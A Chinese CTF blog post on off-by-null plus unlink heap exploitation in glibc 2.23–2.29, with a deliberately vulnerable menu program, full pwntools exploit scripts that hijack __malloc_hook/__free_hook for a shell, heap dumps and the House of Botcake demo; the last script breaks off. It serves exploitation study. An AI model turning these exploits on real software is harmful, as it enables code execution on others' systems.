Heap中的off-by-null+unlink(House Of Botcake)

CTF-PWN

发布日期: 2020-12-06

文章字数: 5.6k

阅读时长: 28 分

阅读次数:

个人看法

因为比较难的堆题，是不会轻易让你获得chunk overlapping的，而堆的overlapping(堆溢出，chunk extending，他们的目的都差不多)是heap题中任意读写的非常重要的一个条件。
而off-by-null是比较常见的漏洞，但利用起来还是有点难度。off-by-null一般将后面chunk的size位最低单字节置零，所以想要进行利用就要求被覆盖的chunk是smallchunk(size向0x100对齐),这样就绕过某些检查。(如果size没有0x100对齐如0x120，将会把20都覆盖)
那么将当前chunk的物理相邻下一个chunk的size inuse成功置零了又有什么用呢？我们知道nextchunk.inuse位是用来判断前一个chunk是否处于使用状态，通常于nextchunk.prev_size配合进行chunk合并，这时候就会用到unlink。合理的构造chunk就可以用off-by-null和unlink配合实现chunk overlapping。

glibc2.23

glibc2.23下主要绕过的检查：

当前free对象不是top
```
if (__glibc_unlikely (p == av->top))
```

下一个chunk地址是否在heap内

if (__builtin_expect (contiguous (av) && (char *) nextchunk >= ((char *) av->top + chunksize(av->top)), 0))

检查nextchunk的rev_inuse位是否为1

if (__glibc_unlikely (!prev_inuse(nextchunk)))

检查nextchunk的size是否合理

if (__builtin_expect (chunksize_nomask (nextchunk) <= 2 * SIZE_SZ, 0) || __builtin_expect (nextsize >= av->system_mem, 0))

一般构造方法：(当然没有万能的构造方法，就像数学中没有万能的公式，具体视情况而定)

将A释放，这样就会在其fd，bk中填入unsortedbin表头，绕过unlink的指向检查
在B中利用off-by-null覆盖c的prev_inuse位，并且在在BC重叠部分即C的prev_size写入0xb0(A+B).
当然这里的B可以根据实际需求改变大小，最常见的就是用于fastbin attack获取malloc或者free hook的读写权
free C chunk，进行unlink达成chunk overlapping，最终chunk放在unsortedbin
D用于防止unsortedbin chunk于topchunk合并

其实这就是House of Einherjar的一种变形，HOE中只要控制C中的prev_inuse=0和prev_size大小就可以malloc任意地址的chunk，其中的一个重要条件就是要泄露地址并在fake_chunk中的fd，bk字段填入指向自己的地址。而这个条件可以通过将 free A进入unsortedbin中达成，只不过这里malloc获取的地址仅限于heap。

例子

#include<stdio.h>
#include<stdlib.h>
#include<unistd.h>
struct chunk{
    long *point;
    unsigned int size;
}chunks[10];

void add()
{
    unsigned int index = 0;
    unsigned int size = 0;
    puts("Index?");
    scanf("%d",&index);
    if(index>=10)
    {
        puts("Wrong index!");
        exit(0);
    }
    puts("Size");
    scanf("%d",&size);
    chunks[index].point=malloc(size);
    if(!chunks[index].point)
    {
        perror("malloc");
        exit(0);
    }
    chunks[index].size=size;
}

void show()
{
    unsigned int index=0;
    puts("Index?");
    scanf("%d",&index);
    if(index>=10)
    {
        perror("size");
        exit(0);
    }
    if(!chunks[index].point)
    {
        puts("It`s empty!");
        exit(0);
    }
    puts((const char*)chunks[index].point);
}

void edit()
{
    unsigned int index=0;
    puts("Index?");
    scanf("%d",&index);
    if(index>=10)
    {
        puts("Wrong index");
        exit(0);
    }
    if(!chunks[index].point)
    {
        puts("It`s empty!");
        exit(0);
    }
    char *p=(char *)chunks[index].point;
    puts("content");
    p[read(0,chunks[index].point,chunks[index].size)]=0;  //<=====这里明显的off-by-null漏洞
}

void delete()
{
    unsigned int index=0;
    puts("Index?");
    scanf("%d",&index);
    if(index>=10)
    {
        puts("Wrong index");
        exit(0);
    }
    if(!chunks[index].point)
    {
        puts("It`s empty");
        exit(0);
    }
    free(chunks[index].point);
    chunks[index].point = 0;
    chunks[index].size = 0;
    puts("done!");
}

void menu()
{
    puts("1)add a chunk");
    puts("2)show content");
    puts("3)edit a chunk");
    puts("4)delete a chunk");
    puts("Choice?");
}

void main()
{
    unsigned int choice;
    puts("Welcome to my off-by-null test");
    puts("wish your luck");
    while(1){
        menu();
        scanf("%d",&choice);
        switch(choice){
        case 1:
            add();
            break;
        case 2:
            show();
            break;
        case 3:
            edit();
            break;
        case 4:
            delete();
            break;
        default:
            exit(0);
        }
    }
}

EXP

#+++++++++++++++++++exp.py++++++++++++++++++++
#!/usr/bin/python
# -*- coding:utf-8 -*-                           
#Author: Squarer
#Time: 2020.12.03 20.06.20
#+++++++++++++++++++exp.py++++++++++++++++++++
from pwn import*

context.arch = 'amd64'

def add(index,size):
        sh.sendlineafter('Choice?\n','1')
        sh.sendlineafter('Index?\n',str(index))
        sh.sendlineafter('Size\n',str(size));

def edit(index,cont):
        sh.sendlineafter('Choice?\n','3')
        sh.sendlineafter('Index?\n',str(index))
        sh.sendlineafter('content\n',str(cont))

def delete(index):
        sh.sendlineafter('Choice?\n','4')
        sh.sendlineafter('Index?\n',str(index))

def show(index):
        sh.sendlineafter('Choice?\n','2')
        sh.sendlineafter('Index?\n',str(index))

def show_addr(name,addr):
        log.success('The '+str(name)+' Addr:' + str(hex(addr)))


#host = 1.1.1.1
#port = 10000
local = 1
if local:
    context.log_level = 'debug'
    libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
    sh = process('./by-null1')
else:
    #context.log_level = 'debug'
    libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
    sh = remote('host','port')



def pwn():
    add(0,0x80)        #A
    add(1,0x68)        #B
    add(2,0xf0)        #C
    add(3,0x10)        #D

    delete(0)
    padding = 'A'*0x60 + p64(0x100)
    edit(1,padding)
    delete(2)
    add(0,0x1f0)
    show(0)
    libc_addr = u64(sh.recv(6).ljust(8,'\x00')) - 0x3c4b20 - 0x58
    show_addr('libc_addr',libc_addr)
    free_hook = libc_addr + libc.sym['__free_hook']
    show_addr('free_hook',free_hook)
    system = libc_addr + libc.sym['system']
    show_addr('system',system)
    fake_chunk = libc_addr + 0x3c4aed
    show_addr('fake_chunk',fake_chunk)
    onegad = [0x45226,0x4527a,0xf0364,0xf1207]
    onegadget = libc_addr + onegad[3]

    delete(1)
    payload = 'A'*0x80 + p64(0x90) + p64(0x71) + p64(fake_chunk)
    edit(0,payload)
    add(1,0x68)
    #gdb.attach(sh)
    add(2,0x68)
    payload = 'A'*0x13 + p64(onegadget)
    edit(2,payload)
    add(7,0x10);
    #gdb.attach(sh)
'''
Fake chunk | Allocated chunk
Addr: 0x7f5b8cf8b795
prev_size: 0x00
size: 0x00
fd: 0x00
bk: 0x7f
fd_nextsize: 0x00
bk_nextsize: 0x5b8d198700000000
'''    

if __name__ == '__main__':
    pwn()
    sh.interactive()

glibc2.27

主要区别就是来了一个更加vulnerable的数据结构：tcache。还是用上面的构造方法：

只不过，由于tcache机制我们需要提前将0x90block和0x100block填满，这样新释放的chunk才会进入unsortedbin中，进行合并。除了这里麻烦了一点其他都还好，在完成chunk overlapping之后free B就可以直接篡改其next字段进行tcache attack。所以这里并不需要对Bchunk进行专门的申请

例子还是以上面的源码为例，改为glibc2.27下的环境

EXP

#+++++++++++++++++++exp.py++++++++++++++++++++
#!/usr/bin/python
# -*- coding:utf-8 -*-                           
#Author: Squarer
#Time: 2020.12.03 20.06.20
#+++++++++++++++++++exp.py++++++++++++++++++++
from pwn import*

context.arch = 'amd64'

def add(index,size):
        sh.sendlineafter('Choice?\n','1')
        sh.sendlineafter('Index?\n',str(index))
        sh.sendlineafter('Size\n',str(size));

def edit(index,cont):
        sh.sendlineafter('Choice?\n','3')
        sh.sendlineafter('Index?\n',str(index))
        sh.sendlineafter('content\n',str(cont))

def delete(index):
        sh.sendlineafter('Choice?\n','4')
        sh.sendlineafter('Index?\n',str(index))

def show(index):
        sh.sendlineafter('Choice?\n','2')
        sh.sendlineafter('Index?\n',str(index))

def show_addr(name,addr):
        log.success('The '+str(name)+' Addr:' + str(hex(addr)))


#host = 1.1.1.1
#port = 10000
local = 1
if local:
    #context.log_level = 'debug'
    libc=ELF('/glibc/x64/2.27/lib/libc-2.27.so')
    sh = process('./by-null1_2.27')
else:
    #context.log_level = 'debug'
    libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
    sh = remote('host','port')



def pwn():
    add(0,0x80)
    add(1,0x18)
    add(2,0xf0)
    for i in range(7):
        add(i+3,0x80)
    for i in range(7):
        delete(i+3)
        add(i+3,0xf0)
    for i in range(7):
        delete(i+3)

    delete(0)
    padding = 'A'*0x10+p64(0xb0)

    edit(1,padding)
    delete(2)
    add(0,0xa0)
    show(0)
    libc_addr = u64(sh.recv(6).ljust(8,'\x00')) - 0x200 - 0x3afc40
    show_addr('libc_addr',libc_addr)
    onegad = [0x41612,0x41666,0xdeed2]
    onegadget = libc_addr + onegad[2]
    show_addr('onegadget',onegadget)
    fake_chunk = libc_addr + libc.sym['__malloc_hook']
    show_addr('fake_chunk',fake_chunk)


    payload = 'A'*0x80 + p64(0x90) + p64(0x21) + p64(fake_chunk)
    delete(1)
    edit(0,payload)
    add(6,0x18)
    add(7,0x18)
    payload = p64(onegadget)
    edit(7,payload)
    add(8,0x10)
    #gdb.attach(sh)
'''
Fake chunk | Allocated chunk | PREV_INUSE | IS_MMAPED | NON_MAIN_ARENA
Addr: 0x7f56e94b9c0d
prev_size: 0x7f
size: 0x56e918b51000007f
fd: 0x7f
bk: 0x56e918afc0000000
fd_nextsize: 0x56e94b5d60000000
bk_nextsize: 0x00
'''

    #delete(2)

if __name__ == '__main__':
    pwn()
    sh.interactive()

glibc2.29

这个就比较难，增加了新的检查机制，先得了解。

tcache结构和成员函数变化

//glibc-2.29
typedef struct tcache_entry
{
  struct tcache_entry *next;
  /* This field exists to detect double frees.  */
  struct tcache_perthread_struct *key;
} tcache_entry;

//glibc-2.27
typedef struct tcache_entry
{
  struct tcache_entry *next;
} tcache_entry;

new：

tcache_entry结构体中新增key指针

pwndbg> parseheap 
addr                prev                size                 status              fd                bk                
0x602000            0x0                 0x250                Used                None              None
0x602250            0x0                 0x30                 Freed                0x0              None
pwndbg> x/8gx 0x602250
0x602250:    0x0000000000000000    0x0000000000000031
0x602260:    0x0000000000000000    0x0000000000602010   <===========是tcache结构体地址
0x602270:    0x0000000000000000    0x0000000000000000
0x602280:    0x0000000000000000    0x0000000000020d81

//glibc-2.29
tcache_put (mchunkptr chunk, size_t tc_idx)
{
  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
  assert (tc_idx < TCACHE_MAX_BINS);

  /* Mark this chunk as "in the tcache" so the test in _int_free will
     detect a double free.  */
   e->key = tcache;    //new

  e->next = tcache->entries[tc_idx];
  tcache->entries[tc_idx] = e;
  ++(tcache->counts[tc_idx]);
}
tcache_get (size_t tc_idx)
{
  tcache_entry *e = tcache->entries[tc_idx];
  assert (tc_idx < TCACHE_MAX_BINS);
  assert (tcache->entries[tc_idx] > 0);
  tcache->entries[tc_idx] = e->next;
  --(tcache->counts[tc_idx]);
  e->key = NULL;    //new
  return (void *) e;
}
//glibc-2.27
tcache_put (mchunkptr chunk, size_t tc_idx)
{
  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
  assert (tc_idx < TCACHE_MAX_BINS);
  e->next = tcache->entries[tc_idx];
  tcache->entries[tc_idx] = e;
  ++(tcache->counts[tc_idx]);
}
tcache_get (size_t tc_idx)
{
  tcache_entry *e = tcache->entries[tc_idx];
  assert (tc_idx < TCACHE_MAX_BINS);
  assert (tcache->entries[tc_idx] > 0);
  tcache->entries[tc_idx] = e->next;
  --(tcache->counts[tc_idx]);
  return (void *) e;
}

new：

tcache chunk插入时，在chunk中的key字段写入tcache结构体地址
tcache chunk取出时，将chunk中的key字段清空

我感觉这个key检测很像stack中的cookie检测，自然伪造是一种方法，其主要防止double free

_int_free

//glibc-2.29
  {
    size_t tc_idx = csize2tidx (size);
    if (tcache != NULL && tc_idx < mp_.tcache_bins)
      {
    /* Check to see if it's already in the tcache.  */ 
        tcache_entry *e = (tcache_entry *) chunk2mem (p);

    /* This test succeeds on double free.  However, we don't 100%
       trust it (it also matches random payload data at a 1 in
       2^<size_t> chance), so verify it's not an unlikely
       coincidence before aborting.  */
    if (__glibc_unlikely (e->key == tcache))  //检查double  free
      {
        tcache_entry *tmp;
        LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
        for (tmp = tcache->entries[tc_idx];
         tmp;
         tmp = tmp->next)
          if (tmp == e)
            malloc_printerr ("free(): double free detected in tcache 2");
        /* If we get here, it was a coincidence.  We've wasted a
           few cycles, but don't abort.  */
      }

    if (tcache->counts[tc_idx] < mp_.tcache_count)
      {
        tcache_put (p, tc_idx);
        return;
      }
      }
  }

//glibc-2.27
{
    size_t tc_idx = csize2tidx (size);
    if (tcache//free+172
        && tc_idx < mp_.tcache_bins
        && tcache->counts[tc_idx] < mp_.tcache_count)
      {
        tcache_put (p, tc_idx);
        return;
      }
  }

new：

在free一个tcache范围内的chunk时会先判断该chunk的key字段是否等于tcache地址，如果不等于。和glibc2.27一样的操作
- 如果等于遍历对应bins中的每一个chunk，看是否与当前chunk地址相等。所以如果执行了这个判断很多tcache attack就很难进行

unlink

//glibc-2.29
/*低地址合并*/
if (!prev_inuse(p)) {
      prevsize = prev_size (p);
      size += prevsize;
      p = chunk_at_offset(p, -((long) prevsize));
      if (__glibc_unlikely (chunksize(p) != prevsize))    //new
        malloc_printerr ("corrupted size vs. prev_size while consolidating");
      unlink_chunk (av, p);
    }

//glibc-2.27
if (!prev_inuse(p)) {
      prevsize = prev_size (p);
      size += prevsize;
      p = chunk_at_offset(p, -((long) prevsize));
      unlink(av, p, bck, fwd);
    }

new：

在进行unlink前会进行判断：进行free的chunk，其prevsize字段要等于低地址chunk的size

一种方法是如果off by one溢出的那个字节可以控制，需要将合并的chunk的size改大，使其越过在其下面若干个chunk，满足size==prevsize的条件，还是可以形成chunk overlapping的。但因为off by null只可能把size改小，所以如果不能控制溢出的字节，就无法构造chunk overlapping了。

_int_malloc–unsortedbin

//glibc-2.29
            mchunkptr next = chunk_at_offset (victim, size);

          if (__glibc_unlikely (chunksize_nomask (next) < 2 * SIZE_SZ)
              || __glibc_unlikely (chunksize_nomask (next) > av->system_mem))
            malloc_printerr ("malloc(): invalid next size (unsorted)");
          if (__glibc_unlikely ((prev_size (next) & ~(SIZE_BITS)) != size))
            malloc_printerr ("malloc(): mismatching next->prev_size (unsorted)");
          if (__glibc_unlikely (bck->fd != victim)
              || __glibc_unlikely (victim->fd != unsorted_chunks (av)))
            malloc_printerr ("malloc(): unsorted double linked list corrupted");
          if (__glibc_unlikely (prev_inuse (next)))
            malloc_printerr ("malloc(): invalid next->prev_inuse (unsorted)");

new：

nextchunk的size字段在合理范围
当前要取出的unsortedbin chunk其size要等于nextchunk的prev_size
倒数第二个free chunk其fd回指要取出的chunk(victim),且victim的fd回指unsorted bin表头
- 这对unsortedbin attack造成了很大影响，很难利用了
nextchunk的prev_inuse位为0

为了应对这些检查机制，大佬们总结了一个方法

House Of Botcake

用how2heap中例子：

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <assert.h>


int main()
{
    /*
     * This attack should bypass the restriction introduced in
     * https://sourceware.org/git/?p=glibc.git;a=commit;h=bcdaad21d4635931d1bd3b54a7894276925d081d
     * If the libc does not include the restriction, you can simply double free the victim and do a
     * simple tcache poisoning
     * And thanks to @anton00b and @subwire for the weird name of this technique */

    // disable buffering so _IO_FILE does not interfere with our heap
    setbuf(stdin, NULL);
    setbuf(stdout, NULL);

    // introduction
    puts("This file demonstrates a powerful tcache poisoning attack by tricking malloc into");
    puts("returning a pointer to an arbitrary location (in this demo, the stack).");
    puts("This attack only relies on double free.\n");

    // prepare the target
    intptr_t stack_var[4];
    puts("The address we want malloc() to return, namely,");
    printf("the target address is %p.\n\n", stack_var);

    // prepare heap layout
    puts("Preparing heap layout");
    puts("Allocating 7 chunks(malloc(0x100)) for us to fill up tcache list later.");
    intptr_t *x[7];
    for(int i=0; i<sizeof(x)/sizeof(intptr_t*); i++){
        x[i] = malloc(0x100);
    }
    puts("Allocating a chunk for later consolidation");
    intptr_t *prev = malloc(0x100);
    puts("Allocating the victim chunk.");
    intptr_t *a = malloc(0x100);
    printf("malloc(0x100): a=%p.\n", a); 
    puts("Allocating a padding to prevent consolidation.\n");
    malloc(0x10);

    // cause chunk overlapping
    puts("Now we are able to cause chunk overlapping");
    puts("Step 1: fill up tcache list");
    for(int i=0; i<7; i++){
        free(x[i]);
    }
    puts("Step 2: free the victim chunk so it will be added to unsorted bin");
    free(a);

    puts("Step 3: free the previous chunk and make it consolidate with the victim chunk.");
    free(prev);

    puts("Step 4: add the victim chunk to tcache list by taking one out from it and free victim again\n");
    malloc(0x100);
    /*VULNERABILITY*/
    free(a);// a is already freed
    /*VULNERABILITY*/

    // simple tcache poisoning
    puts("Launch tcache poisoning");
    puts("Now the victim is contained in a larger freed chunk, we can do a simple tcache poisoning by using overlapped chunk");
    intptr_t *b = malloc(0x120);
    puts("We simply overwrite victim's fwd pointer");
    b[0x120/8-2] = (long)stack_var;

    // take target out
    puts("Now we can cash out the target chunk.");
    malloc(0x100);
    intptr_t *c = malloc(0x100);
    printf("The new chunk is at %p\n", c);

    // sanity check
    assert(c==stack_var);
    printf("Got control on target/stack!\n\n");

    // note
    puts("Note:");
    puts("And the wonderful thing about this exploitation is that: you can free b, victim again and modify the fwd pointer of victim");
    puts("In that case, once you have done this exploitation, you can have many arbitary writes very easily.");

    return 0;
}

环境为glibc2.29。

步骤：

通过7次malloc和7次free填满对应tcache bins
malloc(0x100):prev 为chunk合并的触发器
malloc(0x100):a作为victim chunk，操作目标
malloc(0x10)防止与top合并

对应堆分布：当程序执行完free(a)

            unsortbin: 0x603ad0 (size : 0x110)
(0x110)   tcache_entry[15](7): 0x6038c0 --> 0x6037b0 --> 0x6036a0 --> 0x603590 --> 0x603480 --> 0x603370 --> 0x603260

当执行free(prev)：
chunk a 与chunk prev进行合并，要注意prev在低地址

            unsortbin: 0x6039c0 (size : 0x220)  //<======
(0x110)   tcache_entry[15](7): 0x6038c0 --> 0x6037b0 --> 0x6036a0 --> 0x603590 --> 0x603480 --> 0x603370 --> 0x603260

当执行malloc(0x100)：
0x110 tcache_entry就空出来一个

            unsortbin: 0x6039c0 (size : 0x220)
(0x110)   tcache_entry[15](6): 0x6037b0 --> 0x6036a0 --> 0x603590 --> 0x603480 --> 0x603370 --> 0x603260

当执行free(a):
这次是a的double free ，由于0x110 tcache_entry由空余，所以a被立即放入tcache，不会进行下面的检查(double free)，这样a就同时在tcache链表中和unsortedbin 0x220chunk

之后便是常规操作了：

malloc一个大于 0x110的chunk，这样就会从unsortedbin中切割，获取free chunk a的next字段写的权限
篡改next，指向任意地址(此处指向stack)即可实现任意地址读写
- key的插入仅在向tcache中插入free chunk中起到double free检查的功能，其他还是老样子

该House方案归根结底还是针对tcache的弱检查性，提供了篡改free tcache chunk的next字段的方法。
其主要部分是：

chunk overlapping
通过将free chunk放入tcache绕过后续的检查

glibc2.29下的off-by-null

首先我们回到问题的出发点：为什么要用off-by-null? 答案显而易见：为了实现chunk overlapping。不过glibc对于该方法给出了解决措施：

每次进行unlink时都会检查目标chunk的size和当前chunk的prev_size是否相等
虽然给我们的利用带来了很大的不便，但也不是完全不可能。

由Ex师傅给出的方案

其核心思想是：既然会比对prev_size和size，由于size比较难修改(除非有比较明显的堆溢出)那么不妨构造一个fake_chunk那么其size就是我们可控的了，接下来的任务就是安排相关指针绕过unlink，最后与高地址chunk里应外合，实现chunk overlapping。

步骤一

获得一个freed large chunk(largebin中仅一个chunk)
然后从该large chunk中分割得到一个chunkA，这样chunkA内部就有4个残留指针
继续在chunkA中构造fake_chunkB
- 其中关键在于Bsize计算(与之后的prev_size里应外合)，覆盖fd_next指向一个有残留heap指针的chunk(比如smallbins，unsortedbin中具有多个chunk时即可获得)
- 因为chunkA的fd字段原来是一个~libc地址，无法覆盖为一个合适的位置来绕过unlink，先随便填充

步骤二

获取可控BK_chunk的使用权(malloc出来，或者一开始就malloc如果有edit功能的话)，并覆盖bk段指向fake_chunk
接下来就是想办法把chunkA的fd字段覆盖为指向自己的指针
- 如果这里将chunkA free进入tcache链，那么其fd字段是会填入heap指针，但同时由于这是glibc2.29，Bsize(bk字段)被插入tcache地址
- 所以这里要将chunkA free进入fastbin链表，同样会在其fd字段填入heap指针，而不会改变其他内容，然后我们malloc出来再进行一次覆盖即可
最后free 目标chunk
总结
需要large chunk
需要在unsortedbin或者smallbins中的chunk，用于获取可控BK_chunk
需要可以构成fastbin链表，用于chunkA释放后插入

例子

还是以最上面的那个代码，用patchelf改为glibc2.29环境，并且先关闭ASLR进行测试

先gdb调试发现heap基址为0x555555759670，由于要进行低字节覆盖，所以off-by-null会影响指针覆盖，那么可以先把我们开始利用的heap地址提高到0x555555760000，这样我们覆盖最低字节时null字节不会造成影响。那就先malloc一个size为0x6990的chunk
同时由于需要多次构造双向链表，以及fastbin链表，我们从这个chunk中先预制7个0x30大小的chunk
然后分配一个0x500的chunkA，同时分配一个0x20大小的chunk来分割A和top，A分配完后，释放A，再申请一个更大的chunk(这里是0x600)使得A进入largebin

#step1
    for i in range(7):
        add(i,0x20)
    add(7,0x6980-0x30*7)
#step2
    add(7,0x4f0) #A for large chunk
    add(8,0x10)  #for block top
#step3
    delete(7)
    add(8,0x5f0) #larger than all the free chunks to cause A put into largebins

heap：

                  top: 0x555555760b20 (size : 0x184e0) 
       last_remainder: 0x0 (size : 0x0) 
            unsortbin: 0x0
         largebin[ 4]: 0x555555760000 (size : 0x500)  <======

再从A中获取BCD三个堆块，其中B用来构造fake_chunk，C和D用来形成双向链表，填满tcache后我们可以将D和C先后释放进入fastbin，通过触发malloc_consilate使得C，D先后进入smallbins，这样就形成了双向链表。因此为了满足malloc_consilate我们要将C，D，A隔开。

#step4,5
    for i in range(3):
        add(7+i,0x20) #for B,C,and a block
    add(9,0x20)         #D hebind the block 
    #gdb.attach(sh)
    edit(7,p64(0)+p64(0xf1)+'\x30',0)  #fake B 这里'\x30'是提前根据计划heap布置所得出的 
#step6    
    for i in range(7):
        delete(i)   #for full the tcache
    add(0,0x10)     #for block D and A
    gdb.attach(sh)

其中fake_chunk的size可以先放着，布置好heap后再进行计算

heap：

pwndbg> x/8gx 0x555555760000
0x555555760000:    0x0000000000000000    0x0000000000000031    <====B
0x555555760010:    0x0000000000000000    0x00000000000000f1    <====fake_chunk
0x555555760020:    0x0000555555760030    0x0000555555760000
0x555555760030:    0x0000000000000000    0x0000000000000031    <====C
pwndbg> 
0x555555760040:    0x00007ffff7dd0ca0    0x00007ffff7dd0ca0
0x555555760050:    0x0000000000000000    0x0000000000000000
0x555555760060:    0x0000000000000000    0x0000000000000031
0x555555760070:    0x00007ffff7dd0ca0    0x00007ffff7dd0ca0
pwndbg> 
0x555555760080:    0x0000000000000000    0x0000000000000000
0x555555760090:    0x0000000000000000    0x0000000000000031    <=====D
0x5555557600a0:    0x00007ffff7dd0ca0    0x00007ffff7dd0ca0
0x5555557600b0:    0x0000000000000000    0x0000000000000000
pwndbg> 
0x5555557600c0:    0x0000000000000000    0x0000000000000021    <====block
0x5555557600d0:    0x00007ffff7dd0ca0    0x00007ffff7dd0ca0
0x5555557600e0:    0x0000000000000000    0x0000000000000421    <====A
0x5555557600f0:    0x00007ffff7dd0ca0    0x00007ffff7dd0ca0

然后delete掉D，C注意要先deleteD这样进入smallbin后是C先进入，其bk就会指向heap地址并且C先使用，同时C与fake_chunk相邻，地址容易覆盖(否则稍有不慎就可能地址相差大于0x100，这样off-by-nul就会造成影响)，然后malloc一个largebin中的size就会触发largebin中的malloc_consilate

    #D first freed so after a big malloc,in smallbins C->bk = D
    delete(9)          
    delete(8)
 add(0,0x500)     #triger for travel

heap：

                  top: 0x555555761030 (size : 0x17fd0) 
       last_remainder: 0x5555557600e0 (size : 0x420) 
            unsortbin: 0x0
(0x030)  smallbin[ 1]: 0x555555760090  <--> 0x555555760030   <=======成功，前面那个是D，后面是C
         largebin[ 0]: 0x5555557600e0 (size : 0x420)
(0x30)   tcache_entry[1](7): 0x5555557597a0 --> 0x555555759770 --> 0x555555759740 --> 0x555555759710 --> 0x5555557596e0 --> 0x5555557596b0 --> 0x555555759680

pwndbg> x/8gx 0x555555760000
0x555555760000:    0x0000000000000000    0x0000000000000031
0x555555760010:    0x0000000000000000    0x00000000000000f1  <=====fake
0x555555760020:    0x0000555555760030    0x0000555555760000  <=====fake->fd---->C->bk
0x555555760030:    0x0000000000000000    0x0000000000000031  <=====C
pwndbg> 
0x555555760040:    0x00007ffff7dd0cc0    0x0000555555760090  <=====C->bk
0x555555760050:    0x0000000000000000    0x0000000000000000
0x555555760060:    0x0000000000000030    0x0000000000000030
0x555555760070:    0x00007ffff7dd0ca0    0x00007ffff7dd0ca0
pwndbg> 
0x555555760080:    0x0000000000000000    0x0000000000000000
0x555555760090:    0x0000000000000000    0x0000000000000031  <=====D
0x5555557600a0:    0x0000555555760030    0x00007ffff7dd0cc0
0x5555557600b0:    0x0000000000000000    0x0000000000000000
pwndbg> 
0x5555557600c0:    0x0000000000000030    0x0000000000000020
0x5555557600d0:    0x00007ffff7dd0ca0    0x00007ffff7dd0ca0
0x5555557600e0:    0x0000000000000000    0x0000000000000421
0x5555557600f0:    0x00007ffff7dd1090    0x00007ffff7dd1090

为了得到指向heap的bk，就已经饶了这么大一圈了，离谱，但是还得继续

然后我们要获取C chunk，并覆盖其bk指针，指向fake_chunk

#step7
    for i in range(7):
        add(i,0x20) #use all of tcache chunk
    add(8,0x20)        #C 
    add(9,0x20)        #D for zhe next step 
    edit(8,p64(0)+'\x10',0)  #change C->bk == fake_B

有了bk指针，那么就是要构造fastbin链表，为B->fd获取合适的fd指针。我们将D，B释放进入fstbin，先D，后B

#step8
    for i in range(7):
        delete(i)    #fill the tcache again this time for fastbin_chunk chain
    delete(9)         #into fastbin
    delete(7)        #into fastbin and B->fd == C

heap：

(0x20)     fastbin[0]: 0x0
(0x30)     fastbin[1]: 0x555555760000 --> 0x555555760090 --> 0x0   <======成功
(0x40)     fastbin[2]: 0x0
(0x50)     fastbin[3]: 0x0
(0x60)     fastbin[4]: 0x0
(0x70)     fastbin[5]: 0x0
(0x80)     fastbin[6]: 0x0
(0x90)     fastbin[7]: 0x0
(0xa0)     fastbin[8]: 0x0
(0xb0)     fastbin[9]: 0x0
                  top: 0x555555761030 (size : 0x17fd0) 
       last_remainder: 0x5555557600e0 (size : 0x420) 
            unsortbin: 0x0
         largebin[ 0]: 0x5555557600e0 (size : 0x420)
(0x30)   tcache_entry[1](7): 0x555555759680 --> 0x5555557596b0 --> 0x5555557596e0 --> 0x555555759710 --> 0x555555759740 --> 0x555555759770 --> 0x5555557597a0

接下来把B malloc出来并覆盖其fd指向fake_chunk即可进行unlink + off-by-null == chunk overlapping

#step9
    for i in range(7):
        add(i,0x20)
    add(7,0x20)        #B include it`s fake_B
    add(9,0x20)        #D
    edit(7,'\x10',0)#cover B->fd == fake_B
    add(1,0x18)        #for prev_size and off-by-null the next chunk
    add(0,0xf0)     #the next chunk 
    edit(1,p64(0)*2 +p64(0xf0),0) #prev_size and off-by-null
```python
heap：
```java
pwndbg> x/8gx 0x555555760000
0x555555760000:    0x0000000000000000    0x0000000000000031   <====B & B->fd指针构造成功
0x555555760010:    0x0000555555760010    0x00000000000000f1   <====fake_chunk 
0x555555760020:    0x0000555555760030    0x0000555555760000   <====fake_chunk->bk指针构成成功
0x555555760030:    0x0000000000000000    0x0000000000000031   <====C  #8
pwndbg> 
0x555555760040:    0x0000000000000000    0x0000555555760010
0x555555760050:    0x0000000000000000    0x0000000000000000
0x555555760060:    0x0000000000000030    0x0000000000000031   
0x555555760070:    0x00007ffff7dd0ca0    0x00007ffff7dd0ca0
pwndbg> 
0x555555760080:    0x0000000000000000    0x0000000000000000
0x555555760090:    0x0000000000000000    0x0000000000000031   <====D
0x5555557600a0:    0x0000000000000000    0x0000000000000000
0x5555557600b0:    0x0000000000000000    0x0000000000000000
pwndbg> 
0x5555557600c0:    0x0000000000000030    0x0000000000000021
0x5555557600d0:    0x00007ffff7dd0ca0    0x00007ffff7dd0ca0
0x5555557600e0:    0x0000000000000000    0x0000000000000021
0x5555557600f0:    0x0000000000000000    0x0000000000000000
pwndbg> 
0x555555760100:    0x00000000000000f0    0x0000000000000100  <====target
0x555555760110:    0x00007ffff7dd0ca0    0x00007ffff7dd0ca0
0x555555760120:    0x0000000000000000    0x0000000000000000

接下来就很简单了：填充0x100 tcachebin + overlapping

#step10
    for i in range(7):
        add(i+1,0xf0)
    for i in range(7):
        delete(i+1) #fill the 0x100 tcache
#step11 
    delete(0)        #overlapping 


tcache attack
#get shell
    add(0,0x10)
    show(8)
    libc_addr = u64(sh.recv(6).ljust(8,'\x00')) - 0x3b3ca0
    show_addr('libc_addr',libc_addr)
    free_hook = libc_addr + libc.sym['__free_hook']
    show_addr('free_hook',free_hook)
    system_addr = libc_addr + libc.sym['system']
    show_addr('system_addr',system_addr)

    add(1,0x20)
    delete(8)
    edit(1,p64(free_hook),0)
    add(2,0x20)
    edit(2,"/bin/sh\x00",1)
    add(3,0x20)
    edit(3,p64(system_addr),0)
    delete(2)

完整EXP

#+++++++++++++++++++exp.py++++++++++++++++++++
#!/usr/bin/python
# -*- coding:utf-8 -*-                           
#Author: Squarer
#Time: 2020.12.03 20.06.20
#+++++++++++++++++++exp.py++++++++++++++++++++
from pwn import*

context.arch = 'amd64'

def add(index,size):
        sh.sendlineafter('Choice?\n','1')
        sh.sendlineafter('Index?\n',str(index))
        sh.sendlineafter('Size\n',str(size));

def edit(index,cont,n):
        sh.sendlineafter('Choice?\n','3')
        sh.sendlineafter('Index?\n',str(index))
        if n==1:
            sh.sendlineafter('content\n',str(cont))
        if n==0:
            sh.sendafter('content\n',str(cont))

def delete(index):
        sh.sendlineafter('Choice?\n','4')
        sh.sendlineafter('Index?\n',str(index))

def show(index):
        sh.sendlineafter('Choice?\n','2')
        sh.sendlineafter('Index?\n',str(index))

def show_addr(name,addr):
